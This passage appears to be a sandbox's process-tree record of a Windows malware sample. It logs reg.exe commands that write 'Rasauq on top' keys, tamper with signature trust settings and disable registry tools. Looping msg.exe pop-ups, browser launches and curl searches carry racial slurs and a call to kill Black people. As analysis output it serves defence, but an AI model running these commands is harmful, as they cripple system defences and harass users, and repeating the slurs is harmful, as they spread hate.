      PID:3172
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3560
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2376
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4452
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:3968
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:852
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:772
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:2684
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f
      4⤵
      PID:5624
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5508
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5628
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5040
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:2908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4540
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5184
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      PID:3372
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      PID:5424
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:5480
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:800
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2388
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:5004
  - - C:\Windows\system32\reg.exe
      reg add "Suchvorgang abgeschlossen: 39 übereinstimmende Zeichenfolge(n) gefunden.\Software\Rasauq on top" /f
      4⤵
      PID:2288
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:4900
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5284
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      PID:1540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4308
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5264
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5436
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4044
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3240
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5088
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5696
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5184
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2228
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3076
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4244
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1020
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4260
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4724
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5724
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1808
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3684
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2388
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1920
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4260
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4460
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4140
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1896
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5016
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2500
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3408
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4452
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1964
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2932
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4500
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3976
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6340
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6724
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6848
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6400
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7040
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6860
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3860
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7144
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7072
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6168
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7160
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7136
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1752
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6940
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6880
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2892
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6724
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6752
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7336
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7632
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8036
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8052
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7684
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8088
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7304
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7628
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7380
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7640
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5896
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7348
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7224
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1428
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7672
  - - C:\Windows\system32\msg.exe
